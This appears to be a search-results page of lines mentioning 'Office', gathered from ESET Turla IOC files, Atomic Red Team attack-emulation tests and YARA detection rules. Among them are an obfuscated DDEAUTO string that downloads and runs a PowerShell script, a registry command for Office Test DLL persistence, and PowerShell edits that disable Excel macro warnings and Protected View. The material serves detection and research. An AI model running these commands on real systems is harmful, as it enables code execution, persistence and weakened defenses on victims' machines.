malware-ioc misp-mosquito-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
malware-ioc misp-turla-comrat-v4-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
malware-ioc misp-turla-crutch-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
malware-ioc misp-turla-lightneuron-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
malware-ioc misp-turla-outlook-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", © ESET 2014-2018
malware-ioc misp-turla-powershell-event.json "https://github.com/itsreallynick/office-crackros" © ESET 2014-2018
malware-ioc misp-turla-wateringhole-armenia-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
atomic-red-team Atomic_Friday.md (index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine!="*\Office Automatic Updates*" CommandLine!="*\Office ClickToRun*" \| stats values(CommandLine) by Computer MIT License. © 2018 Red Canary
atomic-red-team Office_Macro_COM.md # Office Macro - COM MIT License. © 2018 Red Canary
atomic-red-team index.md - T1098.003 Add Office 365 Global Administrator Role CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - T1137 Office Application Startup CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - T1137.001 Office Template Macros CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - T1137.002 Office Test MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Office Apllication Startup Test Persistence [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #18: Disable Microsoft Office Security Features [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #5: Office launching .bat file from AppData [windows] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1098.003 Add Office 365 Global Administrator Role CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1137 Office Application Startup CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1137.001 Office Template Macros CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1137.002 Office Test CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #18: Disable Microsoft Office Security Features [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1137 Office Application Startup CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1137.001 Office Template Macros CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1137.002 Office Test MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Office Apllication Startup Test Persistence [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Office launching .bat file from AppData [windows] MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | Compromise Software Dependencies and Development Tools CONTRIBUTE A TEST | Cron | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | At (Linux) | Binary Padding | Bash History | Cloud Account CONTRIBUTE A TEST | Internal Spearphishing CONTRIBUTE A TEST | Archive via Custom Method CONTRIBUTE A TEST | Exfiltration Over Alternative Protocol | Bidirectional Communication CONTRIBUTE A TEST | Application or System Exploitation CONTRIBUTE A TEST | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | | | Office Application Startup CONTRIBUTE A TEST | | Hijack Execution Flow CONTRIBUTE A TEST | Web Portal Capture CONTRIBUTE A TEST | User Activity Based Checks CONTRIBUTE A TEST | | Web Portal Capture CONTRIBUTE A TEST | | One-Way Communication CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | | | Office Template Macros CONTRIBUTE A TEST | | Impair Command History Logging | | Virtualization/Sandbox Evasion CONTRIBUTE A TEST | | | | Port Knocking CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team linux-matrix.md | | | Office Test CONTRIBUTE A TEST | | Impair Defenses CONTRIBUTE A TEST | | | | | | Protocol Impersonation CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | Compromise Software Supply Chain CONTRIBUTE A TEST | Command and Scripting Interpreter CONTRIBUTE A TEST | Add Office 365 Global Administrator Role CONTRIBUTE A TEST | Accessibility Features | Asynchronous Procedure Call | Bash History | Cloud Account CONTRIBUTE A TEST | Exploitation of Remote Services CONTRIBUTE A TEST | Archive via Library CONTRIBUTE A TEST | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol CONTRIBUTE A TEST | Commonly Used Port CONTRIBUTE A TEST | Data Destruction | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Office Application Startup CONTRIBUTE A TEST | Port Monitors CONTRIBUTE A TEST | Impair Command History Logging | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Office Template Macros CONTRIBUTE A TEST | Portable Executable Injection CONTRIBUTE A TEST | Impair Defenses CONTRIBUTE A TEST | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Office Test | PowerShell Profile | Indicator Blocking | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Office Application Startup CONTRIBUTE A TEST | Path Interception by Search Order Hijacking CONTRIBUTE A TEST | Hidden Window | Unsecured Credentials CONTRIBUTE A TEST | | | | | Web Protocols | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Office Template Macros CONTRIBUTE A TEST | Path Interception by Unquoted Path | Hide Artifacts | Web Portal Capture CONTRIBUTE A TEST | | | | | Web Service CONTRIBUTE A TEST | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Office Test | Port Monitors CONTRIBUTE A TEST | Hijack Execution Flow CONTRIBUTE A TEST | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1021.003.md Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1055.md Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office MIT License. © 2018 Red Canary
atomic-red-team T1055.md ##### Description: The 64-bit version of Microsoft Office must be installed MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of JavaScript/JScript on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md A note regarding this module, due to the way that this module utilizes “ScriptControl” a 64bit version of Microsoft Office is required. MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md ##### Description: The 64-bit version of Microsoft Office must be installed MIT License. © 2018 Red Canary
atomic-red-team T1105.md svchost.exe writing a non-Microsoft Office file to a file with a UNC path. MIT License. © 2018 Red Canary
atomic-red-team T1110.001.md In addition to management services, adversaries may “target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,” as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) MIT License. © 2018 Red Canary
atomic-red-team T1110.003.md In addition to management services, adversaries may “target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,” as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md # T1137.002 - Office Test MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md Adversaries may abuse the Microsoft Office “Office Test” Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md There exist user and global Registry keys for the Office Test feature: MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started. MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md - Atomic Test #1 - Office Apllication Startup Test Persistence MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md ## Atomic Test #1 - Office Apllication Startup Test Persistence MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" MIT License. © 2018 Red Canary
atomic-red-team T1137.002.md reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md - Atomic Test #5 - Office launching .bat file from AppData MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md ## Atomic Test #5 - Office launching .bat file from AppData MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. MIT License. © 2018 Red Canary
atomic-red-team T1218.md Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. MIT License. © 2018 Red Canary
atomic-red-team T1218.md | microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\Office16| MIT License. © 2018 Red Canary
atomic-red-team T1559.002.md Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017) MIT License. © 2018 Red Canary
atomic-red-team T1559.002.md Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter. MIT License. © 2018 Red Canary
atomic-red-team T1559.002.md 10. DDEAUTO “C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\v1.0\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString(‘http:///download.ps1'); # " "Microsoft Document Security Add-On" MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md - Atomic Test #18 - Disable Microsoft Office Security Features MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md ## Atomic Test #18 - Disable Microsoft Office Security Features MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel" MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword" MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword" MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword" MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword" MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore MIT License. © 2018 Red Canary
atomic-red-team T1564.md within the office document itself. An example of this technique can be seen in sample MIT License. © 2018 Red Canary
atomic-red-team T1566.001.md There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. MIT License. © 2018 Red Canary
signature-base apt_apt30_backspace.yar $s19 = "2003 Microsoft Office system" fullword wide CC BY-NC 4.0
signature-base apt_apt30_backspace.yar $s2 = "Microsoft Office Word Plugin Scan" fullword wide CC BY-NC 4.0
signature-base apt_apt30_backspace.yar $s6 = "2003 Microsoft Office system" fullword wide CC BY-NC 4.0
signature-base apt_magichound.yar description = "Detects malicious macro / powershell in Office document" CC BY-NC 4.0
signature-base apt_muddywater.yar $s3 = "*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Office16\MSWORD.OLB#Microsoft Word 16.0 O" wide CC BY-NC 4.0
signature-base apt_sednit_delphidownloader.yar $ = "\Interface\Office\{31E12FE8-937F-1E32-871D-B1C9AOEF4D4}\" fullword ascii CC BY-NC 4.0
signature-base apt_unit78020_malware.yar $a4 = "\Office Start.lnk" fullword wide CC BY-NC 4.0
signature-base apt_volatile_cedar.yar $s17 = "Office Outlook HTTP" fullword ascii CC BY-NC 4.0
signature-base apt_winnti_burning_umbrella.yar $s3 = "Microsoft Office Word" fullword ascii CC BY-NC 4.0
signature-base crime_cobaltgang.yar $x9 = "lnkName='office 365'; " fullword ascii CC BY-NC 4.0
signature-base crime_ole_loadswf_cve_2018_4878.yar mitigation0 = "Implement Protected View for Office documents" CC BY-NC 4.0
signature-base crime_ole_loadswf_cve_2018_4878.yar weaponization = "Embedded in Microsoft Office first payloads" CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar reference = "https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about" CC BY-NC 4.0
signature-base exploit_cve_2018_16858.yar description = "RCE in Libre Office with crafted ODT file (CVE-2018-16858)" CC BY-NC 4.0
signature-base exploit_cve_2018_16858.yar and $tag in (0..0100) // <office:doc CC BY-NC 4.0
signature-base general_officemacros.yar description = "Detects an Microsoft Office file that contains the AutoOpen Macro function" CC BY-NC 4.0
signature-base general_officemacros.yar description = "Detects an Microsoft Office saved as a MHTML file (false positives are possible but rare; many matches on CVE-2012-0158)" CC BY-NC 4.0
signature-base general_officemacros.yar $x2 = "0M8R4KGxGuE" ascii // Base64 encoded office header D0CF11E0A1B11AE1.. CC BY-NC 4.0
signature-base generic_anomalies.yar description = "Detects an Office document that was created with a pirated version of MS Office 2007" CC BY-NC 4.0
signature-base generic_anomalies.yar $fp2 = "Office Feature Updates Logon" wide CC BY-NC 4.0
signature-base gen_dde_in_office_docs.yar // YARA rules Office DDE CC BY-NC 4.0
signature-base gen_dde_in_office_docs.yar description = "Detects DDE in MS Office documents" CC BY-NC 4.0
signature-base gen_dde_in_office_docs.yar reference = "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/" CC BY-NC 4.0
signature-base gen_excel_xll_addin_suspicious.yar reference2="https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/" CC BY-NC 4.0
signature-base gen_sign_anomalies.yar description = "Detects a suspicious unsigned office software protection platform service binary" CC BY-NC 4.0
signature-base gen_sign_anomalies.yar /* FileDescription Microsoft Office Software Protection Platform Service */ CC BY-NC 4.0
signature-base gen_susp_cmd_var_expansion.yar description = "Detects Office droppers that include a variable expansion string" CC BY-NC 4.0
signature-base gen_susp_office_dropper.yar description = "Detects Office droppers that include a notice to enable active content" CC BY-NC 4.0
signature-base gen_susp_office_dropper.yar description = "Detects suspicious string that asks to enable active content in Office Doc" CC BY-NC 4.0
signature-base gen_susp_office_dropper.yar $a3 = "Microsoft Office Word" fullword ascii CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar // XML Office documents CC BY-NC 4.0

MIT License. Copyright (c) 2020 Strontic.